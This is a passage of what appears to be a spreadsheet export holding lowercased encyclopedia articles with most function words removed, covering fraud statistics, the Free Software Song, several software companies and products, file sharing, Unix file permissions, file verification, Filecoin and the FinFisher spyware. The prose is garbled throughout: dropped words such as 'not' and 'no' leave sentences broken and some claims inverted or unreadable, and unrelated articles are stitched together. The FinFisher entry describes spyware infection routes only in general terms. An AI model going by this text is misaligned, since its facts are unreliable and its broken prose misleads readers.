chinese consumers. india india criminal laws enshrined indian penal code. supplemented criminal procedure code indian evidence act. europe united kingdom 2016 estimated value lost fraud £193 billion year.in january 2018 financial times reported value fraud 15-year high £2.11bn 2017, according study. article said accountancy firm examined reported fraud cases worth £50,000 found total number rose 2017, compared 2003. study found average amount stolen incident rose £3.66m, £1.5m 2003.as november 2017, fraud common criminal offence according study crowe clark whitehill, experian centre counter fraud studies. study suggests loses £190 billion year fraud. £190 billion uk's projected 2017 ($2,496 (£2,080) billion according statistics times). estimate fraud figure entire countries romania, qatar hungary.according another review anti-fraud charity fraud advisory panel (fap), business fraud accounted £144bn, fraud individuals estimated £9.7bn. particularly critical support available police victims fraud outside london. although victims fraud generally referred uk's national fraud cyber crime reporting centre, action fraud, found "little chance" crime reports would followed kind substantive enforcement action authorities, according report.in july 2016, reported fraudulent activity levels increased years leading 2016 billion £193 this figure would conservative estimate, since former commissioner city london police, adrian leppard, said, crimes actually reported. donald toon, director nca's economic crime command, stated july 2016: "the annual losses fraud estimated £190bn". figures released october 2015 crime survey england wales found million incidents fraud england wales previous year, affecting estimated adults making common form crime.also july 2016, office national statistics (ons) stated "almost million fraud cyber crimes committed last year england wales estimated million computer misuse offences million fraud offences months march 2016." fraud affects people according ons, fraud relates bank account fraud. these figures separate headline estimate another million crimes (distinct fraud) perpetrated adults year march 2016.fraud included "crime harm index" published office national statistics 2016. michael levi, professor criminology cardiff university, remarked august 2016 "deeply regrettable" fraud left first index despite common crime reported police levi said categories excluded, automatically left police's priorities." chief national audit office (nao), anyas morse also said "for long, low-value high-volume crime, online fraud overlooked government, enforcement industry. commonly experienced crime england wales demands urgent response." england, wales, northern ireland since 2007, fraud england wales northern ireland covered fraud 2006. given royal assent november 2006, came effect january 2007.the gives statutory definition criminal offence fraud, defining three classes—fraud false representation, fraud failing disclose information, fraud abuse position. provides person found guilty fraud liable fine imprisonment twelve months summary conviction (six months northern ireland), fine imprisonment years conviction indictment. this largely replaces laws relating obtaining property deception, obtaining pecuniary advantage offences created theft 1978. scotland scots law, fraud covered common number statutory offences. main fraud offences common fraud, uttering, embezzlement, statutory fraud. fraud 2006 apply scotland. governmental organisations serious fraud office government united kingdom, accountable attorney-general. national fraud authority (nfa) was, 2014, government agency co-ordinating counter-fraud response cifas british fraud prevention service, not-for-profit membership organisation sectors enables organisations share access fraud data using databases. cifas dedicated prevention fraud, including internal fraud staff, identification financial related crime. cost participants 2010 survey association certified fraud examiners estimated typical organization loses five percent annual revenue fraud, median loss $160,000. fraud committed owners executives nine times costly employee fraud. industries commonly affected banking, manufacturing, government. types fraudulent acts falsification documents, known forgery, counterfeiting types fraud involved physical duplication fabrication. "theft" one's personal information identity, like finding another's social security number using identification, type fraud. fraud committed across many media including mail, wire, phone, internet (computer crime internet fraud). given international nature ease users hide location, obstacles checking identity legitimacy online, variety hacker techniques available gain access contributed rapid growth internet fraud. countries, fraud also prosecuted false billing forgery. there also fraudulent "discoveries", e.g., science, appetite prestige rather immediate monetary gain. detection detection fraudulent activities large scale possible harvesting massive amounts financial data paired predictive analytics forensic analytics, electronic data reconstruct detect financial fraud. using computer-based analytic methods particular allows surfacing errors, anomalies, inefficiencies, irregularities, biases often refer fraudsters gravitating certain dollar amounts past internal control thresholds. these high-level tests include tests related benford's possibly also statistics known descriptive statistics. high-level tests always followed focused tests look small samples highly irregular transactions. familiar methods correlation time-series analysis also used detect fraud irregularities. anti-fraud provisioning beyond laws prevention fraud, also governmental non-governmental organizations fight fraud. between 1911 1933, states adopted so-called blue laws status. these laws enacted enforced state level regulated offering sale securities protect public fraud. though specific provisions laws varied among states, required registration securities offerings sales, well every u.s. stockbroker brokerage firm. however, blue laws generally found ineffective. increase public trust capital markets president united states, franklin roosevelt, established u.s. securities exchange commission (sec). main reason creation regulate stock market prevent corporate abuses relating offering sale securities corporate reporting. given power license regulate stock exchanges, companies whose securities traded them, brokers dealers conducted trading. further reading apart fraud, several related categories intentional deceptions include elements personal gain damage another individual: obstruction justice u.s.c. criminalizes false representation awarded decoration medal authorized congress armed forces united states also references further reading edward balleisen fraud: american history barnum madoff. isbn 978-0691164557 (2017). princeton university press. fred cohen frauds, spies, lies defeat them. isbn 1-878109-36-7 (2006). press. green, stuart lying, cheating, stealing: moral theory white collar crime. oxford university press, 2006. isbn 978-0199225804 review fraud alex copola podgor, ellen criminal fraud, (1999) vol, american review nature, extent economic impact fraud february, 2007. fraudsters artists steal your money. isbn 978-1-903582-82-4 eamon dillon, published september 2008 merlin publishing zhang, yingyu. book swindles: selections late ming collection. columbia university press, 2017. isbn 978-0231178631 external links dictionary definition fraud wiktionary association certified fraud examiners immigration marriage fraud amendments 1986 home page fraud u.s. department justice fraud section</t>
  </si>
  <si>
    <t>Free Software Song</t>
  </si>
  <si>
    <t>free software song filk song richard stallman free software. song melody bulgarian "sadi moma". version song also performed band (the gnu/stallmans) credits documentary revolution 1998, matt loper recorded techno version song. jono bacon also recorded heavy metal version song, band fenster recorded rhythmic version. addition, spanish punk version recorded alec, rick astley mashup, "never gonna give up".a version used free software karaoke video game sinatra. lyrics join share software; you'll free, hackers, free. join share software; you'll free, hackers, free.hoarders piles money, that true, hackers, true. cannot help neighbors; that's good, hackers, that's good.when enough free software call, hackers, call, we'll kick dirty licenses ever more, hackers, ever more.join share software; you'll free, hackers, free. join share software; you'll free, hackers, free.the lyrics placed public domain. references external links free software song official project website richard stallman free software song youtube satb choir version choral public domain library arrangment international music score library project</t>
  </si>
  <si>
    <t>Flok (company)</t>
  </si>
  <si>
    <t>flok (formerly loyalblocks) american tech startup based york city provides marketing services chatbots/ai, customer loyalty programs, mobile apps services local businesses.in january 2017, company acquired wix.com. around march 2017, flok ceased communication. october 2019, flok communicated email stating flok shutting march 1st, 2020. march 2020, flok communicated email stating flok officially shut down. background flok founded 2011 gaver eran kirshenboim offices aviv, israel. 2013, flok secured million series round general catalyst partners participation founder collective existing investor gemini israel ventures. total, flok raised million venture capital three rounds.in 2014, flok announced self-service loyalty platform smbs build programs beacon integration. time, approximately 40,000 businesses using service. 2016, flok released turnkey chatbot service local businesses, featured adweek developing first weed chatbot california cannabis business. services flok offers eponymous customer-facing consumers receive rewards deals form partner businesses, flok business merchants manage platform. both available android operating systems. flok's main products center around customer loyalty rewards. platform offers digital punch card, proximity marketing, push messaging services addition chatbots features.flok provides partner businesses beacons locate customers verify store visits. july 2016, flok 4-star rating merchant maverick review site. references external links official website</t>
  </si>
  <si>
    <t>PrivacyStar</t>
  </si>
  <si>
    <t>privacystar service identifies calling why, provides call complaint filing reports federal trade commission. privacystar service available mobile applications android ios. several applications powered privacystar, call text blocking available. applications, along privacystar’s iphone lookup+ application, enable users file potential debt collector telemarketer violations directly ftc. application captures detailed information possible fair debt collection practices violations including date, time, number, identity allows users easily provide information regulatory agencies take action. privacystar million users blocked million calls filed 300,000 complaints directly federal trade commission september 2012. fact, privacystar leading source call complaint data reported ftc. 2015, users filed call complaints. february 2013, privacystar launched free spam complaint filing feature android smartphones. application allows users file text message spam complaints addition existing ability file call complaints directly federal trade commission android phones. history founded 2008 jeff stalnaker josh smith, privacystar based little rock, arkansas. jeff stalnaker president company. prior privacystar, stalnaker held position division president financial services division acxiom, marketing company. josh smith privacystar. charles morgan executive chairman board first orion corp., private company developed markets privacystar. also first orion call blocking national call registry consumer privacy references external links privacystar, privacystar home page first orion, first orion home page</t>
  </si>
  <si>
    <t>FlexNet Publisher</t>
  </si>
  <si>
    <t>flexnet publisher (formerly known flexlm) software license manager flexera software implements license management intended used corporate environments provide floating licenses multiple users computer software.computer software licensed variety ways. license piece software associated specific machine (node-locked), permitting machine (node network); alternatively, company pool floating licenses licenses allocated dynamically machines, license checked-out user begins using software given machine checked-in user finishes using software. way, example, company might pool licenses support user community hundreds occasional users software long users ever want software simultaneously). history flexlm originally joint development globetrotter software highland software 1988. highland's rights flexlm product acquired globetrotter 1994; highland continued reseller party software. globetrotter acquired macrovision 2000. combining features safecast protection system flexlm, flexnet featured product activation executable wrapping, supporting floating licensing node locked licensing models. macrovision subsequently renamed flexlm flexnet publisher.the original flexlm development team moved develop reprise license manager (rlm) reprise software 2006.on april 2008 macrovision's software business unit, included flexnet publisher, sold private equity company thoma cressey bravo subsequently relaunched acresso software. cash transaction valued approximately $200 million.in october 2009 acresso software announced name change flexera software flexnet publisher changed flexnet publisher.a july 2011 announcement said teachers' private capital, private investment department ontario teachers' pension plan, agreed acquire majority stake flexera software thoma bravo, llc, private equity firm.the product currently marketed flexera software flexnet publisher. issues bootloaders digital rights management (drm) works flexnet publisher, flexnet affects bootloaders; makes flexnet publisher incompatible drives encrypted truecrypt renders linux-based systems unable boot. truecrypt developers also state "the issue caused inappropriate design third-party activation software." other license management software lm-x license manager open reprise license manager (rlm) windows genuine advantage openlm references external links official website</t>
  </si>
  <si>
    <t>Fleeceware</t>
  </si>
  <si>
    <t>fleeceware type malware mobile application come hidden, excessive subscription fees. these applications also take advantage users know cancel subscription keep charging long deleted application. 2020, million users installed android fleeceware apps play store. term coined 2019 british reseachers. references</t>
  </si>
  <si>
    <t>File Replication Service</t>
  </si>
  <si>
    <t>file replication service (frs) microsoft windows server service distributing shared files group policy objects. replaced (windows manager replication service, partially replaced distributed file system replication. also known ntfrs name executable file runs service. main uses sysvol directory share. sysvol directory share particularly important microsoft network used distribute files supporting group policy scripts client computers network. since group policies scripts time user logs system, important reliability. having multiple copies sysvol directory increases resilience spreads workload essential service. sysvol directory accessed using network share server copy sysvol directory (normally domain controller) shown below: \\server\sysvol accessing using domain name: \\domain.com\sysvol servers work together provide service called replication partners. control file replication: active directory sites services administrative tools. select sites container view list sites. expand site viewed. this provide list servers site. expand server viewed, right click ntds settings, select properties. under connections tab, list servers replicated seen. replication windows server 2003 windows server 2008, replication available well file replication service. replication state-based replication engine file replication among shares, supports replication scheduling bandwidth throttling. uses remote differential compression detect replicate change files, rather replicating entire files, changed. windows vista also includes replication service limited peer-to-peer replication service groups. still used sysvol replication, optionally, replication used instead replication sysvol shares, stopped. up-level windows server 2008 domain controllers, sysvol replication performed using replication, default although ntfrs replication also supported. windows server 2008/r2 up-level domain controllers, sysvol replication performed using replication, ntfrs replication disabled altogether. references external links technical reference dfsr limits windows 2008</t>
  </si>
  <si>
    <t>File sharing</t>
  </si>
  <si>
    <t>file sharing practice distributing providing access digital media, computer programs, multimedia (audio, images video), documents electronic books. common methods storage, transmission dispersion include removable media, centralized servers computer networks, internet-based hyperlinked documents, distributed peer-to-peer networking. file sharing technologies, bittorrent, integral modern media piracy, well sharing scientific data free content. history files first exchanged removable media. computers able access remote files using filesystem mounting, bulletin board systems (1978), usenet (1979), servers (1970's). internet relay chat (1988) hotline (1997) enabled users communicate remotely chat exchange files. encoding, standardized 1991 substantially reduced size audio files, grew widespread late 1990s. 1998, mp3.com audiogalaxy established, digital millennium copyright unanimously passed, first player devices launched.in june 1999, napster released unstructured centralized peer-to-peer system, requiring central server indexing peer discovery. generally credited first peer-to-peer file sharing system. december 1999, napster sued several recording companies lost records, inc. napster, inc.. case napster, ruled online service provider could "transitory network transmission" safe harbor dmca control network server.gnutella, edonkey2000, freenet released 2000, mp3.com napster facing litigation. gnutella, released march, first decentralized file-sharing network. gnutella network, connecting software considered equal, therefore network central point failure. july, freenet released became first anonymity network. september edonkey2000 client server software released.in march 2001, kazaa released. fasttrack network distributed, though, unlike gnutella, assigned traffic 'supernodes' increase routing efficiency. network proprietary encrypted, kazaa team made substantial efforts keep clients morpheus fasttrack network. october 2001, mpaa riaa filed lawsuit developers kazaa, morpheus grokster would lead supreme court's studios, inc. grokster, ltd. decision 2005. shortly loss court, napster shut comply court order. this drove users applications file sharing continued growth. audiogalaxy satellite client grew popularity, limewire client bittorrent protocol released. until decline 2004, kazaa popular file-sharing program despite bundled malware legal battles netherlands, australia, united states. 2002, tokyo district court ruling shut file rogue, recording industry association america (riaa) filed lawsuit effectively shut audiogalaxy. from 2002 2003, number bittorrent services established, including suprnova.org, isohunt, torrentspy, pirate bay. september 2003, riaa began filing lawsuits users file sharing networks kazaa. result lawsuits, many universities added file sharing regulations school administrative codes (though students managed circumvent school hours). also 2003, mpaa started take action bittorrent sites, leading shutdown torrentse sharelive july 2003. with shutdown edonkey 2005, emule became dominant client edonkey network. 2006, police raids took razorback2 edonkey server temporarily took pirate bay.“the file sharing launched chairman towns 2009, prohibited applications allowed individuals share federal information amongst another. hand, specific file sharing applications made available federal computers” (the united states.congress.house). 2009, pirate trial ended guilty verdict primary founders tracker. decision appealed, leading second guilty verdict november 2010. october 2010, limewire forced shut following court order arista records lime group gnutella network remains active open source clients like frostwire gtk-gnutella. furthermore, multi-protocol file-sharing software mldonkey shareaza adapted support major file-sharing protocols, users longer install configure multiple file-sharing programs.on january 2012, united states department justice shut popular domain megaupload (established 2005). file sharing site claimed 50,000,000 people day. dotcom (formerly schmitz) arrested three associates zealand january 2012 awaiting extradition. case involving downfall world's largest popular file sharing site well received, hacker group anonymous bringing several sites associated take-down. following days, file sharing sites began cease services; filesonic blocked public downloads january fileserve following suit january 23.in 2021 european citizens' initiative "freedom share" started collecting signatures order european commission discuss (and eventually make rules) subject, controversial. techniques used video sharing from early 2000s 2010s, online video streaming usually based adobe flash player. after vulnerabilities adobe's flash became known, youtube switched html5 based video playback january 2015. types peer-to-peer file sharing peer-to-peer file sharing based peer-to-peer (p2p) application architecture. shared files computers users indexed directory servers. technology used popular services like napster limewire. popular protocol sharing bittorrent. file sync sharing services cloud-based file syncing sharing services implement automated file transfers updating files dedicated sharing directory user's networked devices. files placed folder also typically accessible website mobile easily shared users viewing collaboration. such services become popular consumer-oriented file hosting services dropbox google drive. with rising need sharing files online easily, open access sharing platforms appeared, adding even services core business (cloud storage, multi-device synchronization, online collaboration), sharefile, tresorit, wetransfer, hightail. rsync traditional program released 1996 synchronizes files direct machine-to-machine basis. data synchronization general approaches share files, distributed filesystems, version control, mirrors. academic file-sharing addition file-sharing purposes entertainment, academic file-sharing become topic increasing concern, deemed violation academic integrity many schools. academic file-sharing companies chegg course hero become point particular controversy recent years. this institutions provide explicit guidance students faculty regarding academic integrity expectations relating academic file-sharing. public opinion file sharing 2004 estimated million people participating online file sharing. according news poll 2009, americans follow file sharing issue, considered acceptable person owns music shares limited number friends acquaintances"; 29-year-olds percentage reached much 70%.in survey file-sharing culture, caraway (2012) noted 74.4% participants believed musicians accept file sharing means promotion distribution. this file-sharing culture termed cyber socialism, whose legalisation expected utopia. economic impact according david glenn, writing chronicle higher education, majority economic studies concluded file-sharing hurts sales". literature review professor peter tschmuck found independent studies effects music file sharing. studies, roughly two-thirds conclude unauthorized downloads 'negative even highly negative impact' recorded music sales. three studies found significant impact remaining five found positive impact."a study economists felix oberholzer-gee koleman strumpf 2004 concluded music file sharing's effect sales "statistically indistinguishable zero". this research disputed economists, notably stan liebowitz, said oberholzer-gee strumpf made multiple assumptions music industry "that correct." june 2010, billboard reported oberholzer-gee strumpf "changed minds", finding recent decline sales sharing". however, citing nielsen soundscan source, co-authors maintained illegal downloading deterred people original. many creative industries, monetary incentives play reduced role motivating authors remain creative. data supply works consistent argument file-sharing discourage authors publishers. since advent file sharing, production music, books, movies increased sharply." glenn peoples billboard disputed underlying data, saying "soundscan's number releases given year represents commercial titles, necessarily creative works." riaa likewise responded "new releases" "new creative works" separate things. "[t]his figure includes re-releases, compilations existing songs, digital-only versions catalog albums. soundscan also steadily increased number retailers (especially non-traditional retailers) sample years, better capturing number releases brought market. what oberholzer strumpf found better ability track album releases, greater incentive create them."a 2006 study prepared birgitte andersen marion frenz, published industry canada, "unable discover direct relationship file-sharing purchases canada". results survey similarly criticized academics subsequent revaluation data george barker australian national university reached opposite conclusion. total, downloaders responded available would purchased either paid sites (9%), (17%) sites (49%). only people would bought music available free." barker thus concludes; "this clearly suggests network availability reducing music demand music downloaders quite contrary andersen frenz's much published claim."according 2017 paper "estimating displacement rates copyrighted content european commission, illegal usage increases game sales, stating "the overall conclusion games, illegal online transactions induce legal transactions." market dominance paper journal management science found file-sharing decreased chance survival ranked albums music charts increased exposure albums ranked high music charts, allowing popular well-known artists remain music charts often. this hurt less-known artists promoting work already popular artists celebrities.a recent study examined pre-release file-sharing music albums, using bittorrent software, also discovered positive impacts "established popular artists newer smaller artists." according robert hammond north carolina state university, album leaked month early would modest increase sales. "this increase sales small relative factors found affect album sales." "file-sharing proponents commonly argue file-sharing democratizes music consumption 'levelling playing field' new/small artists relative established/popular artists, allowing artists work heard wider audience, lessening advantage held established/popular artists terms promotional support. results suggest opposite happening, consistent evidence file-sharing behaviour." billboard cautioned research looked pre-release period continuous file sharing following release date. "the problem believing piracy helps sales deciding draw line legal illegal implicit study fact buyers sellers required order pre-release file sharing positive impact album sales. without itunes, amazon, best buy, file-sharers would file sharers rather purchasers. carry 'file-sharing legal' argument logical conclusion, today's retailers tomorrow's file-sharing services integrate respective cloud storage services." availability many argue file-sharing forced owners entertainment content make widely available legally fees advertising on-demand internet. 2011 report sandvine showed netflix traffic come surpass bittorrent. copyright issues file sharing raises copyright issues many lawsuits. united states, lawsuits even reached supreme court. example, grokster, supreme court ruled creators networks held liable software marketed tool copyright infringement. hand, file sharing illegal. content public domain freely shared. even works covered copyright shared certain circumstances. example, artists, publishers, record labels grant public license unlimited distribution certain works, sometimes conditions, advocate free content file sharing promotional tool. also comparison file sharing applications file hosting service file sharing news sites graduated response love sale (bilal album), unreleased infamously pirated album bilal missionary church kopimism open music model publius (publishing system) torrent poisoning trade group efforts file sharing warez references further reading levine, robert. free ride: internet destroying culture business culture business fight back, bodley head, february 2011. ghosemajumder, shuman. advanced peer-based technology business models. sloan school management, 2002 silverthorne, sean. music downloads: pirates- customers?. harvard business school working knowledge, 2004. ralf steinmetz, klaus wehrle (eds). peer-to-peer systems applications. isbn 3-540-29192-x, lecture notes computer science, volume 3485, september 2005 stephanos androutsellis-theotokis diomidis spinellis. survey peer-to-peer content distribution technologies. computing surveys, 36(4):335–371, december 2004. doi:10.1145/1041680.1041681. stefan saroiu, krishna gummadi, steven gribble. measurement study peer-to-peer file sharing systems. technical report uw-cse-01-06-02. department computer science engineering. university washington. seattle, usa.</t>
  </si>
  <si>
    <t>File system permissions</t>
  </si>
  <si>
    <t>most file systems include attributes files directories control ability users read, change, navigate, execute contents file system. cases, menu options functions made visible hidden depending user's permission level; kind user interface referred permission-driven. types permissions widely available: traditional unix file system permissions access-control lists (acls) capable specific control. file system variations original file allocation table file system per-file all-user read-only attribute. ntfs implemented microsoft windows derivatives, acls provide complex permissions. openvms uses permission scheme similar unix. there four categories (system, owner, group, world) four types access permissions (read, write, execute delete). categories mutually disjoint: world includes group, turn includes owner. system category independently includes system users.hfs implemented classic operating systems, support permissions. versions 10.3 ("panther") prior posix-compliant permissions. beginning version 10.4 ("tiger"), also support nfsv4 acls. they support "traditional unix permissions" used previous versions apple server version 10.4+ file services administration manual recommends using traditional unix permissions possible. also still supports classic's "protected" attribute. solaris support depends filesystem used; older filesystem supports posix.1e acls, supports nfsv4 acls.linux supports ext2, ext3, ext4, btrfs file systems many include posix.1e acls. there experimental support nfsv4 acls ext3 ext4 filesystems. freebsd supports posix.1e acls ufs, nfsv4 acls zfs.ibm z/os implements file security using racf (resource access control facility)the amigaos filesystem, amigados supports permissions system relatively advanced single-user amigaos 1.x, files archive, read, write, execute delete (collectively known arwed) permissions/flags. amigaos higher, additional hold, script, pure permissions/flags added. traditional unix permissions permissions unix-like file systems managed three scopes classes known user, group, others. when file created permissions restricted umask process created classes files directories owned user. owner determines file's user class. distinct permissions apply owner. files directories assigned group, define file's group class. distinct permissions apply members file's group. owner member file's group. users owner, member group, comprise file's others class. distinct permissions apply others. effective permissions determined based first class user falls within order user, group others. example, user owner file permissions given user class regardless permissions assigned group class others class. permissions unix-like systems implement three specific permissions apply class: read permission grants ability read file. when directory, permission grants ability read names files directory, find information contents, file type, size, ownership, permissions. write permission grants ability modify file. when directory, permission grants ability modify entries directory, includes creating files, deleting files, renaming files. note requires execute also set; without write permission meaningless directories. execute permission grants ability execute file. this permission must executable programs, order allow operating system them. when directory, execute permission interpreted search permission: grants ability access file contents meta-information name known, list files inside directory, unless read also.the effect setting permissions directory, rather file, "one frequently misunderstood file permission issues".when permission set, corresponding rights denied. unlike acl-based systems, permissions unix-like systems inherited. files created within directory necessarily permissions directory. changing permission behavior setuid, setgid, sticky bits unix-like systems typically employ three additional modes. these actually attributes referred permissions modes. these special modes file directory overall, class, though symbolic notation (see below) setuid triad user, setgid triad group sticky triad others. user setuid, suid mode. when file setuid executed, resulting process assume effective user given owner class. this enables users treated temporarily root another user). group setgid, sgid permission. when file setgid executed, resulting process assume group given group class. when setgid applied directory, files directories created directory inherit group directory. (default behaviour primary group effective user setting group files directories, except bsd-derived systems behave though setgid always directories (see setuid).) sticky mode (also known text mode). classical behaviour sticky executable files encourage kernel retain resulting process image memory beyond termination; however, sticky restricted minority unix-like operating systems (hp-ux unixware). directory, sticky permission prevents users renaming, moving deleting contained files owned users themselves, even write permission directory. only directory owner superuser exempt this.these additional modes also referred setuid bit, setgid bit, sticky bit, fact occupy bit. notation traditional unix permissions symbolic notation unix permissions represented either symbolic notation octal notation. common form, used command symbolic notation. first character display indicates file type related permissions. remaining nine characters three sets, representing class permissions three characters. first represents user class. second represents group class. third represents others class. each three characters represent read, write, execute permissions: reading permitted, not. writing permitted, not. execution permitted, not.the following examples symbolic notation: -rwxr-xr-x: regular file whose user class full permissions whose group others classes read execute permissions. crw-rw-r--: character special file whose user group classes read write permissions whose others class read permission. dr-x------: directory whose user class read execute permissions whose group others classes permissions.in permission systems additional symbols display represent additional permission features: (plus) suffix indicates access control list control additional permissions. (dot) suffix indicates selinux context present. details listed command suffix indicates extended file attributes present.to represent setuid, setgid sticky text attributes, executable character modified. though attributes affect overall file, users class, setuid attribute modifies executable character triad user, setgid attribute modifies executable character triad group sticky text attribute modifies executable character triad others. setuid setgid attributes, first second triad, becomes becomes sticky text attribute, third triad, becomes becomes here example: -rwsr-sr-t: file whose user class read, write execute permissions; whose group class read permission; whose others class read execute permissions; setuid, setgid sticky attributes set. numeric notation another method representing unix permissions octal (base-8) notation shown stat this notation consists least three digits. each three rightmost digits represents different component permissions: owner, group, others. fourth digit present, leftmost (high-order) digit addresses three additional attributes, setuid bit, setgid sticky bit.) each digits component bits binary numeral system. result, specific bits represented numeral: read adds total binary 100), write adds total binary 010), execute adds total binary 001).these values never produce ambiguous combinations; represents specific permissions. more technically, octal representation field references separate permission, grouping bits time octal corresponds grouping permissions user, group, others. these examples symbolic notation section given octal notation: user private group some systems diverge traditional posix model users groups creating group "user private group" user. assuming user member user private group, scheme allows umask used without allowing users write newly created files normal directories files assigned creating user's private group. however, sharing files desirable, administrator create group containing desired users, create group-writable directory assigned group, and, importantly, make directory setgid. making setgid cause files created assigned group directory umask (enabled using user private groups) ensure members group able write files. also comparison_of_file_systems#metadata chmod: change mode (permissions) unix-like file systems chattr chflags: change attributes flags including restrict access. lsattr list attributes posix umask user identifier (unix) group identifier (unix) references external links linux cookbook: groups work them michael stutz 2004</t>
  </si>
  <si>
    <t>File verification</t>
  </si>
  <si>
    <t>file verification process using algorithm verifying integrity computer file, usually checksum. this done comparing files bit-by-bit, requires copies file, miss systematic corruptions might occur files. popular approach generate hash copied file comparing hash original file. integrity verification file integrity compromised, usually referred file becoming corrupted. file become corrupted variety ways: faulty storage media, errors transmission, write errors copying moving, software bugs, hash-based verification ensures file corrupted comparing file's hash value previously calculated value. values match, file presumed unmodified. nature hash functions, hash collisions result false positives, likelihood collisions often negligible random corruption. authenticity verification often desirable verify file modified transmission storage untrusted parties, example, include malicious code viruses backdoors. verify authenticity, classical hash function enough designed collision resistant; computationally trivial attacker cause deliberate hash collisions, meaning malicious change file detected hash comparison. cryptography, attack called preimage attack. purpose, cryptographic hash functions employed often. long hash sums cannot tampered example, communicated secure channel files presumed intact. alternatively, digital signatures employed assure tamper resistance. file formats checksum file small file contains checksums files. there well-known checksum file formats.several utilities, md5deep, checksum files automatically verify entire directory files operation. particular hash algorithm used often indicated file extension checksum file. ".sha1" file extension indicates checksum file containing 160-bit sha-1 hashes sha1sum format. ".md5" file extension, file named "md5sums", indicates checksum file containing 128-bit hashes md5sum format. ".sfv" file extension indicates checksum file containing 32-bit crc32 checksums simple file verification format. "crc.list" file indicates checksum file containing 32-bit checksums brik format. 2012, best practice recommendations sha-2 sha-3 generate file integrity digests; accept sha1 digests backward compatibility stronger digests available. theoretically weaker sha1, weaker md5, much weaker previously commonly used file integrity checks.crc checksums cannot used verify authenticity files, crc32 collision resistant hash function even hash file tampered with, computationally trivial attacker replace file digest original file, meaning malicious change file detected comparison. references also checksum data deduplication</t>
  </si>
  <si>
    <t>File-system permissions</t>
  </si>
  <si>
    <t>Filecoin</t>
  </si>
  <si>
    <t>filecoin open-source, public cryptocurrency digital payment system intended blockchain-based cooperative digital storage data retrieval method. made protocol labs builds interplanetary file system, allowing users rent unused hard drive space. blockchain mechanism used register deals. filecoin open protocol backed blockchain records commitments made network’s participants, transactions made using fil, blockchain’s native currency. blockchain based proof-of-replication proof-of-spacetime. history project launched august 2017 raised $200 million within minutes. philanthropy april 2021 filecoin foundation donated 50,000 filecoins worth $10,000,000 internet archive. addition, internet archive's founder brewster kahle director partnerships wendy hanamura joined boards advisors filecoin filecoin foundation decentralized web. network total storage power february 2022 total storage capacity 15.6 eib, total data stored pib. also proof space-time blockchain dfinity distributed data store interplanetary file system references external links official website</t>
  </si>
  <si>
    <t>FinFisher</t>
  </si>
  <si>
    <t>finfisher, also known finspy, surveillance software marketed lench solutions plc, markets spyware enforcement channels.finfisher covertly installed targets' computers exploiting security lapses update procedures non-suspect software. company criticized human rights organizations selling capabilities repressive non-democratic states known monitoring imprisoning political dissidents. egyptian dissidents ransacked offices egypt's secret police following overthrow egyptian president hosni mubarak reported discovered contract gamma international €287,000 license finfisher software. 2014, american citizen sued ethiopian government surreptitiously installing finspy onto computer america using wiretap private skype calls monitor entire family's every computer period months.lench solutions uk-based branch, gamma international andover, england, germany-based branch, gamma international gmbh munich. gamma international subsidiary gamma group, specializing surveillance monitoring, including equipment, software, training services. reportedly owned william louthean nelson shell corporation british virgin islands. shell corporation signed nominee director order withhold identity ultimate beneficiary, nelson, common system companies established offshore.on august 2014, finfisher source code, pricing, support history, related data retrieved gamma international internal network made available internet.the finfisher gmbh opened insolvency proceedings munich local court 02.12.2021, however restructuring company continue vilicius holding gmbh. elements finfisher suite addition spyware, finfisher suite offered gamma intelligence community includes monitoring ongoing developments updating solutions techniques complement developed intelligence agencies. software suite, company calls "remote monitoring deployment solutions", ability take control target computers capture even encrypted data communications. using "enhanced remote deployment methods" install software target computers. intrusion training program" offered includes training methods techniques company-supplied software.the suite marketed arabic, english, german, french, portuguese, russian offered worldwide trade shows offering intelligence support system, iss, training, products enforcement intelligence agencies. method infection finfisher malware installed various ways, including fake software updates, emails fake attachments, security flaws popular software. sometimes surveillance suite installed target accepts installation fake update commonly used software. code install malware also detected emails. software, designed evade detection antivirus software, versions work mobile phones major brands.a security flaw apple's itunes allowed unauthorized third parties itunes online update procedures install unauthorized programs. gamma international offered presentations government security officials security software trade shows described covertly install finfisher software suspects' computers using itunes' update procedures. security flaw itunes finfisher reported exploited first described 2008 security software commentator brian krebs. apple patch security flaw three years, november 2011. apple officials offered explanation flaw took long patch. promotional videos used firm trade shows illustrate infect computer surveillance suite released wikileaks december, 2011.in 2014, ethiopian government found installed finspy computer american citizen fake email attachment appeared microsoft word document.finfisher also found engage politically motivated targeting. ethiopia, instance, photos political opposition group used "bait" infect users.technical analysis malware, methods infection persistence techniques published code security blog four parts. repressive regimes finfisher's wide governments facing political resistance reported march 2011 egyptian protesters raided state security investigations service found letters gamma international ltd., confirming using trial version five months. similar report august 2012 concerned e-mails received bahraini activists passed (via bloomberg news reporter) university toronto computer researchers bill marczak morgan marquis-boire 2012. analysis e-mails revealed code (finspy) designed install spyware recipient's computer. spokesman gamma claims software sold bahrain software detected researchers legitimate copy perhaps stolen, reverse-engineered modified demonstration copy. august 2014 bahrain watch claimed leak finfisher data contained evidence suggesting bahraini government using software opposition figures, highlighting communications gamma international support staff customer bahrain, identifying number human rights lawyers, politicians, activists journalists apparently targeted. according document dated december 2012 federal ministry interior members finance committee german parliament, german "bundesnachrichtendienst", federal surveillance agency, licensed finfisher/finspy, even though legality germany uncertain. 2014, america citizen sued ethiopian government installing using finspy record vast array activities conducted users machine, whilst america. traces spyware inadvertently left computer show information including recordings dozens skype phone calls surreptitiously sent secret control server located ethiopia controlled ethiopian government. finspy downloaded plaintiff's computer opened email microsoft word document attached. attachment contained hidden malware infected computer. march 2017, united states court appeals district columbia circuit found ethiopian government's conduct protected liability foreign sovereign immunities act.in 2015, finfisher reported since 2012 'fungua macho' surveillance programme uganda's president museveni, spying upon ugandan opposition party, forum democratic change. reporters without borders march 2013 reporters without borders named gamma international five "corporate enemies internet" “digital mercenaries” selling products used governments violate human rights freedom information. finfisher technology used bahrain reporters without borders, together privacy international, european center constitutional human rights (ecchr), bahrain centre human rights, bahrain watch filed organisation economic co-operation development (oecd) complaint, asking national contact point united kingdom investigate gamma's possible involvement bahrain. since research shown finfisher technology used australia, austria, bahrain, bangladesh, britain, brunei, bulgaria, canada, czech republic, estonia, ethiopia, germany, hungary, india, indonesia, japan, latvia, lithuania, north macedonia, malaysia, mexico, mongolia, netherlands, nigeria, pakistan, panama, qatar, romania, serbia, singapore, south africa, turkey, turkmenistan, united arab emirates, united states, venezuela vietnam. firefox masquerading finfisher capable masquerading legitimate programs, mozilla firefox. april 2013, mozilla announced sent gamma cease-and-desist letter trademark infringement. gamma created espionage program entitled firefox.exe even provided version number trademark claims appear legitimate firefox software. detection article magazine, bill marczak (member 